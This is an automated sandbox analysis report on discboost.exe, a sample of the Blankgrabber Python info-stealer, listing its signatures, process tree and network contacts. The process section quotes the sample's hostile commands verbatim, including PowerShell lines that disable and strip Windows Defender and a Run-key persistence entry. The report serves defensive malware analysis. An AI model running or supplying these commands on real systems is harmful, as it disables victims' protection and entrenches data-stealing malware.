Malware Analysis Report

2025-06-16 00:41

Sample ID 241110-1rt9wsvras
Target discboost.exe
SHA256 deb17b39d8bfb61c95dabdce0ad4b2000647557f8b3d678a34bc135707f5dc16
Tags
blankgrabber discovery execution persistence pyinstaller spyware stealer upx privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

deb17b39d8bfb61c95dabdce0ad4b2000647557f8b3d678a34bc135707f5dc16

Threat Level: Known bad

The file discboost.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber discovery execution persistence pyinstaller spyware stealer upx privilege_escalation

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Enumerates processes with tasklist

Browser Information Discovery

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 21:53

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 21:53

Reported

2024-11-10 21:54

Platform

win10ltsc2021-20241023-fr

Max time kernel

30s

Max time network

38s

Command Line

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ip-api.com N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 2956 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 236 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4476 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2848 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1816 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1816 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1904 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1904 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4392 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4392 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4364 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1524 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4364 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3324 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 5056 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 5056 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4364 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4316 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4316 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4364 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4948 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 blank-m0lpq.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 ipapi.co udp
US 104.26.9.44:443 ipapi.co tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 44.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
